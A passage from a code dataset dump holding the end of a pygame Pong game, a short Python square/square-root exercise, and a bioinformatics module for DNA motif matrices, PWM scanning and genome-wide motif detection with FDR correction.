pygame.K_DOWN:\n                pad_right.move_down()\n            elif event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\n                ball.start(randint(1, 3), randint(1, 3))\n\n        if ball.rect.colliderect(top) or ball.rect.colliderect(bottom):\n            ball.change_y()\n        elif (ball.rect.colliderect(pad_left.rect) or\n                ball.rect.colliderect(pad_right.rect)):\n            ball.change_x()\n\n        screen_rect = screen.get_rect().inflate(0, -10)\n        pad_left.rect.clamp_ip(screen_rect)\n        pad_right.rect.clamp_ip(screen_rect)\n\n        if ball.rect.colliderect(left):\n            right_score.score_up()\n            ball.reset()\n            ball.stop()\n        elif ball.rect.colliderect(right):\n            left_score.score_up()\n            ball.reset()\n            ball.stop()\n\n        sprites.update()\n\n        screen.blit(background, (0, 0))\n        sprites.draw(screen)\n        pygame.display.flip()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"pong-pygame/pong/orig_sou.py","file_name":"orig_sou.py","file_ext":"py","file_size_in_byte":5013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"152374063","text":"import math\nnum_01 = int(input('Enter the number: '))\n\nif num_01 > 0:\n    num_Q = num_01 ** 2\n    print(f'{num_Q}')\n    num_R = math.sqrt(num_01)\n    print(f'{num_R}')\n\nelse:\n    print('Invalid number!')","sub_path":"Exercicios/Seção 05/04_Exercicio.py","file_name":"04_Exercicio.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"319887876","text":"import os\nimport bs4\nimport numpy\nimport scipy.stats\nimport pandas\nimport math\nimport re\nimport datetime\nimport collections\nimport statsmodels.sandbox.stats.multicomp\nfrom Bio.motifs._pwm import calculate as biopython_motif_calculate\n\nfrom pgtools import toolbox\n\nBACKGROUND_FREQUENCY_FILENAME = toolbox.home_path('model_data/background_nucleotide_frequencies.csv')\n\n\ndef get_background_frequencies(genome_build, background_frequency_fname=BACKGROUND_FREQUENCY_FILENAME):\n    updated = False\n\n    print('Loading background nucleotide frequencies from {}'.format(background_frequency_fname))\n    try:\n        background_models = pandas.read_csv(background_frequency_fname, index_col=0).to_dict('list')\n    except (IOError, OSError):\n        background_models = {}\n        print('File {} not found.'.format(background_frequency_fname))\n    else:\n        print('Background frequencies loaded.')\n\n    if genome_build in background_models:\n        print('Found background model for genome {}: {}'.format(genome_build, background_models[genome_build]))\n    else:\n        
print('\\tBackground frequencies for genome build {} not found. Computing now...'.format(\n genome_build))\n genome = genomic_tools.Genome(genome_build)\n background_models[genome_build] = genome.compute_nucleotide_frequencies()\n updated = True\n \n if updated:\n print('Saving updated background nucleotide frequencies to {}'.format(background_frequency_fname))\n pandas.DataFrame(background_models).to_csv(background_frequency_fname)\n \n return background_models[genome_build]\n\n \ndef generate_random_sequence(size, nucleotide_frequencies=[0.25]*4, random_seed=None):\n \"\"\"\n Returns a string of random nucleotides of length :param:`size` drawn from the distribution\n specified by :param:`nucleotide_frequencies`. \n \"\"\"\n numpy.random.seed(random_seed)\n return ''.join(numpy.random.choice(['A', 'C', 'G', 'T'], size=size, p=nucleotide_frequencies))\n\n###############################################################################\n## Motif classes \n###############################################################################\n\n# ToDo: add in k-nucleotide attributes and conversion methods.\nclass Motif():\n \"\"\"\n Parent class for motif instances.\n \"\"\"\n CHARS_TO_REMOVE = '[|]ACGT'\n\n def __repr__(self):\n return self.data.__repr__()\n \n def __str__(self):\n return self.data.__str__()\n \n @property\n def motif_width(self):\n return self.data.shape[1]\n \n @classmethod\n def _parse_horizontal_motif(cls, matrix_string_list, dtype):\n assert len(matrix_string_list) == 4\n\n # Peek at the first line to detect number of columns\n split_line = re.split(toolbox.WHITESPACE, toolbox.replace_multi(matrix_string_list[0], cls.CHARS_TO_REMOVE, '').strip())\n num_columns = len(split_line)\n\n matrix = numpy.zeros((4, num_columns), dtype=dtype)\n for matrix_row, line in enumerate(matrix_string_list):\n split_line = re.split(toolbox.WHITESPACE, toolbox.replace_multi(line, cls.CHARS_TO_REMOVE, '').strip())\n assert len(split_line) == num_columns, 'Found {} columns on row {}, expected {}'.format(len(split_line), matrix_row, num_columns)\n matrix[matrix_row, :] = numpy.array([dtype(element) for element in split_line])\n\n return matrix\n \n @classmethod\n def _parse_vertical_motif(cls, matrix_string_list, dtype):\n num_rows = len(matrix_string_list)\n\n matrix = numpy.zeros((4, num_rows), dtype=dtype)\n for matrix_row, line in enumerate(matrix_string_list):\n if line != '':\n split_line = re.split(toolbox.WHITESPACE, toolbox.replace_multi(line, cls.CHARS_TO_REMOVE, '').strip())\n assert len(split_line) == 4, 'Found {} columns on row {}, expected 4'.format(len(split_line), matrix_row)\n matrix[:, matrix_row] = numpy.array([dtype(element) for element in split_line])\n return matrix \n \n @staticmethod\n def _read_multi_motif_file(multi_motif_filename):\n \"\"\"\n Reads the contents of :param:`motif_filename` that contains motif matrices separated by FASTA-style\n headers (lines starting with '>\") and returns a dictionary of lists of lines keyed by header contents.\n \n These lines can be then passed to parsing functions to convert them to motif matrices.\n \"\"\"\n lines_dict = collections.OrderedDict()\n with open(multi_motif_filename, 'rt') as multi_motif_file:\n these_lines = []\n \n for line in multi_motif_file:\n line = line.strip()\n if line:\n if line.startswith('>'): # header line\n if these_lines:\n assert header not in lines_dict, 'Encountered duplicate entry for motif {} !'.format(header) \n lines_dict[header] = these_lines\n these_lines = []\n header = line[1:].strip()\n else:\n 
these_lines.append(line.strip())\n \n lines_dict[header] = these_lines\n \n return lines_dict\n \n def rev_complement(self):\n \"\"\"\n Retruns the reverse complement of a motif (either PWM or PFM) by reversing the order and transposing A/T and C/G.\n :param motif_matrix: A 2D matrix with nucleotides in rows in alpha order A,C,G,T and positions in columns\n :return: A 2D matrix with nucleotides in rows in alpha order A,C,G,T and positions in columns\n \"\"\"\n return self.data[(3, 2, 1, 0), ::-1]\n \n \nclass Pcm(Motif):\n def __init__(self, pcm_matrix):\n \"\"\"\n \"\"\"\n assert pcm_matrix.dtype == int, 'Received invalid dtype {} for pcm_matrix, was expecting int'.format(pcm_matrix.dtype)\n pcm_matrix = numpy.array(pcm_matrix, dtype=int)\n self.data = pcm_matrix\n \n @classmethod\n def from_strings(cls, pcm_strings, orientation='horiz'):\n if orientation == 'horiz':\n return cls(cls._parse_horizontal_motif(pcm_strings, dtype=int))\n elif orientation == 'vert':\n return cls(cls._parse_vertical_motif(pcm_strings, dtype=int)) \n\n @classmethod\n def from_file(cls, pcm_filename, orientation='horiz'):\n with open(pcm_filename, 'rt') as in_file:\n pcm_strings = in_file.readlines()\n if pcm_strings[0].startswith('>'):\n pcm_strings = pcm_strings[1:]\n\n return cls.from_strings(pcm_strings=pcm_strings, orientation=orientation) \n \n def to_pfm(self, pseudocount=0):\n \"\"\"\n Converts a position count matrix (PCM) to position frequency matrix (PFM) by converting counts to frequencies\n (assume nucleotides in rows in alpha order A,C,G,T,\n transpose the input if nucleotides in columns).\n Adds to each entry before calculating.\n \"\"\"\n return Pfm(((self.data + pseudocount) / self.data.sum(axis=0)).astype(float))\n \n def to_pwm(self, background_model=[0.25] * 4, pseudocount=0):\n \"\"\"\n Converts a PCM to PWM by converting counts to frequencies (assume nucleotides in rows in alpha order A,C,G,T,\n transpose the input if nucleotides in columns), then calculating the log2 ratio between the matrix frequency and\n the background frequency ( should be given as a sequence of four frequencies in A,C,G,T order.)\n\n Adds .\n \"\"\"\n return Pwm(numpy.log2(numpy.apply_along_axis(numpy.divide, 0, self.to_pfm(pseudocount).data, background_model)))\n \n \nclass Pfm(Motif):\n def __init__(self, pfm_matrix):\n \"\"\"\n \"\"\"\n pfm_matrix = numpy.array(pfm_matrix)\n assert pfm_matrix.dtype == float, 'Recieved invalid dtype {} for pfm_matrix, was expecting float'.format(pfm_matrix.dtype)\n self.data = pfm_matrix\n\n @classmethod\n def from_homer_strings(cls, homer_strings):\n header_line = homer_strings[0] # currently unused\n return cls._parse_vertical_motif(homer_strings[1:], dtype=float)\n \n @classmethod\n def from_strings(cls, pfm_strings, orientation='horiz'):\n if orientation == 'horiz':\n return cls(cls._parse_horizontal_motif(pfm_strings, dtype=float))\n elif orientation == 'vert':\n return cls(cls._parse_vertical_motif(pfm_strings, dtype=float)) \n\n @classmethod\n def from_file(cls, pfm_filename, orientation='horiz'):\n with open(pfm_filename, 'rt') as in_file:\n pfm_strings = in_file.readlines()\n if pfm_strings[0].startswith('>'):\n pfm_strings = pfm_strings[1:]\n\n return cls.from_strings(pfm_strings=pfm_strings, orientation=orientation) \n \n def to_pcm(self, total_count=1000, pseudocount=0):\n \"\"\"\n Converts a position frequency matrix (PFM) to a theoretical position count matrix (PCM)\n by multiplying each frequency by the specified :param:`total_count`\n\n (assumes nucleotides in rows in 
alpha order A,C,G,T,\n transpose the input if nucleotides in columns).\n\n Adds to each entry before calculating.\n \"\"\"\n return Pcm((self.data * total_count).astype(int) + pseudocount) \n \n def to_pwm(self, background=[0.25] * 4, pseudofrequency=0):\n \"\"\"\n Converts a PFM to PWM by converting frequencies to weights (assume nucleotides in rows in alpha order A,C,G,T,\n transpose the input if nucleotides in columns), then calculating the log2 ratio between the matrix frequency and\n the background frequency ( should be given as a sequence of four weights in A,C,G,T order.)\n\n Adds .\n \"\"\"\n return Pwm(numpy.log2(numpy.apply_along_axis(numpy.divide, 0, self.data + pseudofrequency, background)))\n\n def export_to_homer(self, motif_name, motif_filename, llr_threshold=0):\n with open(motif_filename, 'wt') as motif_file:\n motif_file.write('>{}\\t{}\\t{}\\n'.format(''.join(consensus_sequence(self.data)), motif_name, llr_threshold))\n for col in range(self.motif_width):\n motif_file.write('{}\\n'.format('\\t'.join([str(x) for x in self.data[:, col]])))\n \n def entropy_by_pos(self):\n entropy_weights = numpy.zeros(self.motif_width)\n for pos in range(self.motif_width):\n for nuc in range(4):\n entropy_weights[pos] -= self.data[nuc, pos] * math.log(self.data[nuc, pos], 2)\n return entropy_weights\n\n \n \nclass Pwm(Motif):\n def __init__(self, pwm_matrix):\n \"\"\"\n \"\"\"\n pwm_matrix = numpy.array(pwm_matrix)\n assert pwm_matrix.dtype == float, 'Recieved invalid dtype {} for pfm_matrix, was expecting float'.format(pfm_matrix.dtype)\n self.data = pwm_matrix\n \n def export_pwm_to_meme(self, motif_name, fname, background_model, meme_version=4, strands='+'):\n \"\"\"\n Placeholder stub for export to meme\n \"\"\"\n with open(fname, 'wt') as out_file:\n out_file.write('MEME version {}\\n'.format(meme_version))\n out_file.write('ALPHABET = ACGT\\n')\n out_file.write('STRANDS: +\\n')\n out_file.write('Background letter frequencies\\n')\n out_file.write('A {} C {} G {} T {}\\n'.format(*background_model))\n out_file.write('MOTIF {}\\n'.format(motif_name))\n pass\n \n def scan_sequence(self, sequence):\n return scan_pwm(sequence, self)\n \n\ndef load_jaspar_motifs(jaspar_filename):\n \"\"\"\n Assuming :param:`jaspar_filename` contains a sequence of jaspar motifs, \n returns the contents of as a dictionary of PCMs. 
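As an aside on the conversion implemented by `Pcm.to_pfm` and `Pfm.to_pwm` above, here is a minimal standalone sketch of the count -> frequency -> log2-odds pipeline; the toy counts and the uniform background are made up for illustration, and the pseudocounted columns are normalised so each sums to 1.

```python
import numpy

# Toy position count matrix: rows are A, C, G, T; columns are motif positions.
pcm = numpy.array([[ 8,  1],
                   [ 1,  1],
                   [ 1, 16],
                   [10,  2]])

# Counts -> frequencies, adding a pseudocount as Pcm.to_pfm does (here the
# columns are normalised by the pseudocounted totals so they sum to 1).
pseudocount = 1
pfm = (pcm + pseudocount) / (pcm + pseudocount).sum(axis=0)

# Frequencies -> log2 odds against a background model, as in Pfm.to_pwm.
background = numpy.array([0.25, 0.25, 0.25, 0.25])
pwm = numpy.log2(pfm / background[:, None])

print(pwm.round(2))  # positive weights mark over-represented nucleotides
```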
\n \"\"\"\n return {re.split(toolbox.WHITESPACE, key)[1]:Pcm.from_strings(lines) for key, lines in Pcm._read_multi_motif_file(jaspar_filename).items()}\n \n \ndef load_homer_motifs(homer_filename):\n \"\"\"\n Loads the motifs found in :param:`homer_filename` and returns them as a \n dictionary of Pfm objects keyed by the order in which they appear.\n \"\"\"\n \n return {i:Pfm.from_homer_strings(lines) for i, lines in enumerate(Pfm._read_multi_motif_file(homer_filename).values())}\n\n \ndef load_vert_motifs(motif_filename):\n \"\"\"\n Loads the vertical PFMs found in :param:`motif_filename` and returns them as a \n dictionary of Pfm objects keyed by header.\n \"\"\"\n return {header:Pfm.from_strings(lines, orientation='vert') for header, lines in Pfm._read_multi_motif_file(motif_filename).items()} \n \n \n ##############################################################################\n ## Other tools\n ##############################################################################\n \ndef compute_background_distribution(seq, normalize=True):\n \"\"\"\n Computes the background nucleotide distribution of a sequence (essentially a 1-position PCM)\n Returns a PFM ( if you want a PFM)\n \"\"\"\n background_freq = toolbox.freq(seq)\n background_pcm = numpy.array(\n [background_freq[k] for k in sorted(background_freq.keys()) if k in ('A', 'C', 'G', 'T')])\n if normalize:\n return pcm_to_pfm(background_pcm)\n else:\n return background_pcm\n\n\ndef exclusive_joint(prob_a, prob_b):\n \"\"\"\n Returns the joint probability of (A and not B) or (B and not A)\n \"\"\"\n return prob_a + prob_b - prob_a * prob_b\n\n\ndef binding_probabilities(energies, mu=0):\n \"\"\"\n Returns a vector of binding probabilities given a single strand vector of binding energy values (such as generated by a PWM)\n and a scalar that adjusts for the free concentration of ligand (theoretically equal to ln[TF]).\n :param energies:\n :param mu:\n :return:\n \"\"\"\n return 1 / (1 + numpy.exp(-energies - mu))\n\n \ndef energy_to_prob(energy_neg, energy_pos, mu):\n return exclusive_joint(binding_probabilities(energy_pos, mu), binding_probabilities(energy_neg, mu))\n\n\n\ndef consensus_sequence(horizontal_motif_matrix):\n \"\"\"\n Given either a PWM or PFM in horizontal format, returns a string containing the consensus\n sequence of that motif (best-matching nucleotide at each position)\n \"\"\"\n nucs = numpy.array(['A', 'C', 'G', 'T'])\n return nucs[numpy.argmax(horizontal_motif_matrix, axis=0)]\n\n\ndef scan_pwm(seq, pwm, score_offset=0, at_motif_midpoint=False, method='Bio'):\n \"\"\"\n Given a sequence and a Pwm object,\n compute the single-stranded binding energy of the subsequence starting at each\n position. 
Scores are placed at the starting point of the motif subsequence unless is specified, in\n which case they are shifted by the given amount toward the end of the motif.\n \"\"\"\n if at_motif_midpoint:\n motif_length = pwm.data.shape[1]\n motif_midpoint = motif_length / 2 - 1\n score_offset += motif_midpoint\n if method == 'Bio':\n scan = _scan_pwm_biopython(seq, pwm.data, score_offset=score_offset)\n else:\n scan = _scan_pwm_native_python(seq, pwm.data, score_offset=score_offset)\n assert len(scan) == len(seq) # check that we didn't screw this up\n return scan\n\n\ndef _scan_pwm_biopython(seq, pwm, score_offset=0):\n \"\"\"\n Biopython expects nucleotides in columns, but since I like to have them in rows, this function assumes rows\n and transposes the PWM that's passed to Biopython.\n\n Scores are placed at the starting point of the motif subsequence unless is specified, in\n which case they are shifted by the given amount toward the end of the motif.\n :param seq:\n :param pwm:\n :return:\n \"\"\"\n motif_length = pwm.shape[1]\n score_offset = int(score_offset)\n if type(seq) == numpy.ndarray:\n scan = biopython_motif_calculate(''.join(seq), pwm.T)\n else:\n scan = biopython_motif_calculate(seq, pwm.T)\n return numpy.concatenate((numpy.zeros(score_offset), scan, numpy.zeros(motif_length - score_offset - 1)))\n\n\ndef _scan_pwm_native_python(seq, pwm, score_offset=0, N_score=-4.64):\n \"\"\"\n Given a sequence and a PWM in log-odds format, compute the single-stranded binding energy of the subsequence starting at each\n position. Scores are placed at the starting point of the motif subsequence unless is specified, in\n which case they are shifted by the given amount toward the end of the motif.\n\n Any 'N's in the sequence will be assigned the value of . Default is roughly equivalent to a 1/100\n probability versus a background of 1/4\n \"\"\"\n nuc_dict = {'A': 0, 'C': 1, 'G': 2, 'T': 3}\n score = numpy.zeros(len(seq))\n for start_pos in range(len(seq) - pwm.shape[1]):\n for offset in range(pwm.shape[1]):\n if seq[start_pos + offset] == 'N':\n score[start_pos + score_offset] += N_score\n else:\n score[start_pos + score_offset] += pwm[nuc_dict[seq[start_pos + offset]]][offset]\n return score\n\n\n\ndef find_motifs_empirical(genome, pwm, lr_threshold=0, fdr=0.05, p_val_threshold=None):\n \"\"\"\n An early attempt at motif site thresholding by empirical p-value. 
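To make the scanner's contract concrete, here is a minimal pure-Python scan in the spirit of `_scan_pwm_native_python`; the 2-column PWM is hypothetical, every full window is scored at its start position, and ambiguous `N` bases receive the default penalty.

```python
import numpy

# A hypothetical 2-column PWM (rows A, C, G, T) strongly favouring "CA".
pwm = numpy.array([[-2.0,  1.5],
                   [ 1.5, -2.0],
                   [-2.0, -2.0],
                   [-2.0, -2.0]])

seq = 'TTCAGN'
nuc_index = {'A': 0, 'C': 1, 'G': 2, 'T': 3}
scores = numpy.zeros(len(seq))

# Slide the motif along the sequence; the score for each window is the sum
# of the per-position weights, with a flat penalty for 'N' bases.
for start in range(len(seq) - pwm.shape[1] + 1):
    for offset in range(pwm.shape[1]):
        base = seq[start + offset]
        scores[start] += -4.64 if base == 'N' else pwm[nuc_index[base], offset]

print(scores)  # peaks at 3.0 at index 2, where "CA" begins
```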
Not recommended.\n \"\"\"\n start_time = datetime.datetime.now()\n # number the contigs\n contig_names = {contig_number:contig_name for contig_number, contig_name in enumerate(sorted(genome.contig_names))}\n contig_numbers = {contig_name:contig_number for contig_number, contig_name in enumerate(sorted(genome.contig_names))}\n\n rev_pwm = motif_rev_complement(pwm) # compute the reverse complement of the motif\n\n # build genome wide arrays: contig identity, motif score, and start location\n contig_ids_by_contig = []\n motif_scores_by_contig = []\n start_locations_by_contig = []\n strands_by_contig = []\n print('Scoring genome sequence ...')\n for contig_name in toolbox.numerical_string_sort(genome.contig_lengths.keys()):\n contig_length = genome.contig_lengths[contig_name]\n print('\\tScoring contig {} ...'.format(contig_name))\n for strand in (True, False): \n contig_ids_by_contig.append(numpy.full(shape=contig_length, fill_value=contig_numbers[contig_name], dtype=numpy.int))\n motif_scores_by_contig.append(scan_pwm(genome.get_dna_sequence(contig_name), (rev_pwm, pwm)[strand], at_motif_midpoint=False))\n start_locations_by_contig.append(numpy.arange(contig_length))\n strands_by_contig.append(numpy.full(shape=contig_length, fill_value=strand, dtype=numpy.bool))\n \n print('Concatenating results ...')\n contig_ids = numpy.concatenate(contig_ids_by_contig)\n del(contig_ids_by_contig)\n motif_scores = numpy.concatenate(motif_scores_by_contig)\n del(motif_scores_by_contig)\n start_locations = numpy.concatenate(start_locations_by_contig)\n del(start_locations_by_contig)\n strands = numpy.concatenate(strands_by_contig)\n del(strands_by_contig)\n\n # remove any loci with NaN scores\n print('Filtering out invalid loci ...')\n nonnan_loci = numpy.nonzero(~numpy.isnan(motif_scores))[0]\n contig_ids = contig_ids[nonnan_loci]\n motif_scores = motif_scores[nonnan_loci]\n start_locations = start_locations[nonnan_loci]\n strands = strands[nonnan_loci]\n print('\\tRemoved {} out of {} loci'.format((genome.size*2) - len(nonnan_loci), (genome.size*2)))\n del(nonnan_loci)\n\n # Fit a normal distribution to the whole dataset prior to filtering\n print('Fitting normal distribution ...')\n data_size = len(motif_scores)\n data_mean, data_std = motif_scores.mean(), motif_scores.std()\n motif_score_distribution = scipy.stats.norm(loc=data_mean, scale=data_std)\n print('\\tMotif scores have mean {:>0.2}, SD {:>0.2}'.format(data_mean, data_std))\n\n # threshold by likelihood ratio\n if lr_threshold is not None:\n print('Filtering by likelihood ratio > {}'.format(lr_threshold))\n candidate_mask = motif_scores > lr_threshold\n motif_scores = motif_scores[candidate_mask]\n contig_ids = contig_ids[candidate_mask]\n start_locations = start_locations[candidate_mask]\n strands = strands[candidate_mask]\n print('\\tFound {} loci out of {}.'.format(len(motif_scores), data_size))\n\n print('Computing p-values ...')\n # Compute p-values\n p_vals = 1 - motif_score_distribution.cdf(motif_scores)\n print('\\tDone.')\n\n # threshold by p-value\n if p_val_threshold is not None:\n initial_hit_size = len(motif_scores)\n print('Discarding hits with p-values greater than {} ...'.format(p_val_threshold))\n p_val_mask = p_vals < p_val_threshold\n p_vals = p_vals[p_val_mask]\n motif_scores = motif_scores[p_val_mask]\n contig_ids = contig_ids[p_val_mask]\n start_locations = start_locations[p_val_mask]\n strands = strands[p_val_mask]\n print('\\t{} out of {} hits passed p-value cutoff'.format(len(p_vals), initial_hit_size)) \n \n 
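The multiple-testing step that follows relies on `multipletests` from statsmodels; this self-contained sketch with invented p-values shows what the Benjamini-Hochberg call returns.

```python
import numpy
from statsmodels.sandbox.stats.multicomp import multipletests

# Made-up p-values: a few strong hits in a sea of background tests.
p_vals = numpy.array([1e-8, 1e-6, 0.003, 0.04, 0.2, 0.51, 0.83])

reject, q_vals, _, _ = multipletests(p_vals, alpha=0.05, method='fdr_bh')

# q_vals[i] is the smallest FDR at which hit i would still be accepted;
# reject marks the hits that survive at the requested FDR.
for p, q, keep in zip(p_vals, q_vals, reject):
    print('p={:<8.2g} q={:<8.2g} keep={}'.format(p, q, keep))
```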
print('Applying multiple testing correction ...')\n pass_fail, q_vals, dummy, dummy = statsmodels.sandbox.stats.multicomp.multipletests(p_vals, alpha=fdr, method='fdr_bh')\n\n print('\\tFound {} hits at an FDR of {}'.format(pass_fail.sum(), fdr))\n \n print('Constructing output ...')\n q_vals = q_vals[pass_fail]\n length_cutoff = len(q_vals)\n \n # Do final sorting and thresholding.\n sort_index = numpy.argsort(motif_scores)[::-1]\n motif_scores = motif_scores[sort_index][:length_cutoff]\n contig_ids = contig_ids[sort_index][:length_cutoff]\n start_locations = start_locations[sort_index][:length_cutoff]\n strands = strands[sort_index][:length_cutoff]\n p_vals = p_vals[sort_index][:length_cutoff]\n \n strand_translate = {True:'+', False:'-'}\n\n output_regions = pandas.DataFrame({'contig':[contig_names[contig_num] for contig_num in contig_ids],\n 'start': start_locations,\n 'end': start_locations + pwm.shape[1],\n 'strand': [strand_translate[strand] for strand in strands],\n 'motif_lr_score': motif_scores,\n 'p_value': p_vals,\n 'q_value': q_vals,\n })[['contig', 'start','end', 'strand', 'motif_lr_score', 'p_value', 'q_value']]\n \n print('All done in {}'.format(datetime.datetime.now() - start_time))\n return output_regions\n \n\ndef find_motifs(sequence_dictionary, pwm, llr_threshold=0, fdr=0.05, p_val_threshold=None, polish_partition=True, initial_search_fraction=1e-7, mem_map=False):\n \"\"\"\n Models the motif score distribution as a mixture of signal component defined by a PWM\n and a gaussian noise component.\n \"\"\"\n # ToDo: Add KS test sanity check for agreement of background scores to background distribution.\n \n start_time = datetime.datetime.now()\n motif_width = pwm.shape[1]\n \n # number the contigs\n contig_names = {contig_number:contig_name for contig_number, contig_name in enumerate(sorted(sequence_dictionary))}\n contig_numbers = {contig_name:contig_number for contig_number, contig_name in enumerate(sorted(sequence_dictionary))}\n contig_lengths = {contig_name:len(sequence_dictionary[contig_name]) for contig_name in sequence_dictionary}\n genome_size = sum([len(sequence_dictionary[contig_name]) for contig_name in sequence_dictionary])\n\n rev_pwm = motif_rev_complement(pwm) # compute the reverse complement of the motif\n\n # build genome wide arrays: contig identity, motif score, and start location\n contig_ids_by_contig = []\n motif_scores_by_contig = []\n start_locations_by_contig = []\n strands_by_contig = []\n print('Scoring genome sequence ...')\n for contig_name in toolbox.numerical_string_sort(sequence_dictionary):\n contig_length = len(sequence_dictionary[contig_name])\n print('\\tScoring contig {} ...'.format(contig_name))\n for strand in (True, False): \n contig_ids_by_contig.append(numpy.full(shape=contig_length, fill_value=contig_numbers[contig_name], dtype=numpy.int16)[:-(motif_width -1)])\n motif_scores_by_contig.append(scan_pwm(sequence_dictionary[contig_name], (rev_pwm, pwm)[strand], at_motif_midpoint=False)[:-(motif_width -1)])\n start_locations_by_contig.append(numpy.arange(contig_length).astype(numpy.int32)[:-(motif_width -1)])\n strands_by_contig.append(numpy.full(shape=contig_length, fill_value=strand, dtype=numpy.bool)[:-(motif_width -1)])\n\n del(sequence_dictionary)\n \n print('Concatenating chromosomes ...')\n contig_ids = numpy.concatenate(contig_ids_by_contig)\n del(contig_ids_by_contig)\n motif_scores = numpy.concatenate(motif_scores_by_contig)\n del(motif_scores_by_contig)\n start_locations = numpy.concatenate(start_locations_by_contig)\n 
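A brief aside on the `(rev_pwm, pwm)[strand]` trick used in the per-contig scoring loop: for rows in A, C, G, T order, the reverse-complement PWM is the matrix flipped on both axes, so minus-strand hits can be scored against the forward sequence. The matrix below is hypothetical.

```python
import numpy

# Hypothetical PWM, rows in A, C, G, T order.
pwm = numpy.array([[ 1.0, -1.0,  0.5],
                   [-1.0,  0.2, -1.0],
                   [ 0.3, -1.0, -1.0],
                   [-1.0,  1.0,  0.4]])

# Complementing swaps A<->T and C<->G, which reverses the row order, and
# reading the opposite strand reverses the column order, so the
# reverse-complement PWM is the matrix flipped on both axes.
rev_pwm = pwm[::-1, ::-1]

# Equivalent to Motif.rev_complement's explicit row permutation.
assert numpy.array_equal(rev_pwm, pwm[(3, 2, 1, 0), ::-1])

# Scanning the forward sequence with rev_pwm therefore scores motif
# matches on the minus strand, without reverse-complementing the
# (potentially genome-sized) sequence itself.
```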
del(start_locations_by_contig)\n strands = numpy.concatenate(strands_by_contig)\n del(strands_by_contig)\n\n # remove any loci with NaN scores\n print('Filtering out invalid loci ...')\n nonnan_loci = numpy.nonzero(~numpy.isnan(motif_scores))[0]\n contig_ids = contig_ids[nonnan_loci]\n motif_scores = motif_scores[nonnan_loci]\n start_locations = start_locations[nonnan_loci]\n strands = strands[nonnan_loci]\n print('\\tRemoved {} out of {} loci'.format((genome_size*2) - len(nonnan_loci), (genome_size*2)))\n del(nonnan_loci)\n\n print('Prioritizing ...')\n sort_index = numpy.argsort(motif_scores)[::-1]\n motif_scores = motif_scores[sort_index]\n contig_ids = contig_ids[sort_index]\n start_locations = start_locations[sort_index]\n strands = strands[sort_index]\n del(sort_index)\n \n if mem_map:\n print('Mem mapping ...')\n motif_scores = toolbox.replace_with_mem_map(motif_scores, tmp_dir=TMP_DIR)\n contig_ids = toolbox.replace_with_mem_map(contig_ids, tmp_dir=TMP_DIR)\n start_locations = toolbox.replace_with_mem_map(start_locations, tmp_dir=TMP_DIR)\n strands = toolbox.replace_with_mem_map(strands, tmp_dir=TMP_DIR)\n \n\n print('Computing initial partition ...')\n background_mean = motif_scores.mean()\n background_std = motif_scores.std()\n print('\\tInitial background N({}, {})'.format(background_mean, background_std))\n length_cutoff = numpy.argmin(numpy.abs(motif_scores - numpy.log2(toolbox.my_normal_pdf(motif_scores,\n mean=background_mean,\n sigma=background_std))))\n\n print('\\tEstimated {} true motifs.'.format(length_cutoff))\n \n if polish_partition:\n def obj_func(params):\n cutoff = int(params)\n\n background_scores = motif_scores[cutoff:]\n background_mean = background_scores.mean()\n background_std = background_scores.std()\n ll_background = numpy.log2(toolbox.my_normal_pdf(background_scores, mean=background_mean, sigma=background_std)).sum()\n \n true_scores = motif_scores[:cutoff]\n ll_true = true_scores.sum()\n \n ll_total = ll_background + ll_true\n\n print('\\tcutoff {}; background N({}, {})'.format(cutoff, background_mean, background_std))\n print('\\tll bkg=bkg {:>0.2}, true=true {:>0.2}, total {:>0.2}'.format(ll_background, ll_true, ll_total))\n\n return -ll_total\n \n initial_right_bound = length_cutoff + int(len(motif_scores) * initial_search_fraction)\n \n print('Searching for maximum likelihood partition from {} to {} ...'.format(length_cutoff, initial_right_bound))\n length_cutoff = toolbox.binary_int_min(obj_func, bounds=(length_cutoff, initial_right_bound))\n if length_cutoff == initial_right_bound: # the true minimum may be past our cutoff\n print('Initial search failed! 
Extending search to whole genome ...')\n length_cutoff = toolbox.binary_int_min(obj_func, bounds=(length_cutoff, len(motif_scores)))\n\n print('Found {} likely true motifs'.format(length_cutoff))\n true_scores = motif_scores[:length_cutoff]\n background_scores = motif_scores[length_cutoff:]\n \n print('Fitting normal distribution to background scores ...')\n data_size = len(motif_scores)\n background_mean, background_std = background_scores.mean(), background_scores.std() \n background_score_distribution = scipy.stats.norm(loc=background_mean, scale=background_std)\n del(background_scores)\n print('\\tBackground scores have mean {:>0.2}, SD {:>0.2}'.format(background_mean, background_std))\n\n print('Computing final log-likelihood ratios ...')\n llr = motif_scores - numpy.log2(toolbox.my_normal_pdf(motif_scores, mean=background_mean, sigma=background_std))\n \n if llr_threshold is not None:\n print('Finding motif hits with log-likelihood ratios greater than {} ...'.format(llr_threshold))\n llr_mask = llr > llr_threshold\n motif_scores = motif_scores[llr_mask]\n contig_ids = contig_ids[llr_mask]\n start_locations = start_locations[llr_mask]\n strands = strands[llr_mask]\n del(llr_mask)\n print('\\tKept {} motif hits.'.format(len(motif_scores)))\n \n print('Computing p-values ...')\n # Compute p-values\n p_vals = 1 - background_score_distribution.cdf(motif_scores)\n print('\\tDone.')\n\n # threshold by p-value\n if p_val_threshold is not None:\n initial_hit_size = len(motif_scores)\n print('Discarding hits with p-values greater than {} ...'.format(p_val_threshold))\n p_val_mask = p_vals < p_val_threshold\n p_vals = p_vals[p_val_mask]\n motif_scores = motif_scores[p_val_mask]\n contig_ids = contig_ids[p_val_mask]\n start_locations = start_locations[p_val_mask]\n llr = llr[p_val_mask]\n strands = strands[p_val_mask]\n del(p_val_mask)\n print('\\t{} out of {} hits passed p-value cutoff'.format(len(p_vals), initial_hit_size)) \n \n print('Applying multiple testing correction ...')\n pass_fail, q_vals, dummy, dummy = statsmodels.sandbox.stats.multicomp.multipletests(p_vals, alpha=fdr, method='fdr_bh')\n\n print('\\tFound {} hits at an FDR of {}'.format(pass_fail.sum(), fdr))\n \n print('Constructing output ...')\n q_vals = q_vals[pass_fail]\n length_cutoff = len(q_vals)\n \n # Do final thresholding.\n motif_scores = motif_scores[:length_cutoff]\n contig_ids = contig_ids[:length_cutoff]\n start_locations = start_locations[:length_cutoff]\n strands = strands[:length_cutoff]\n p_vals = 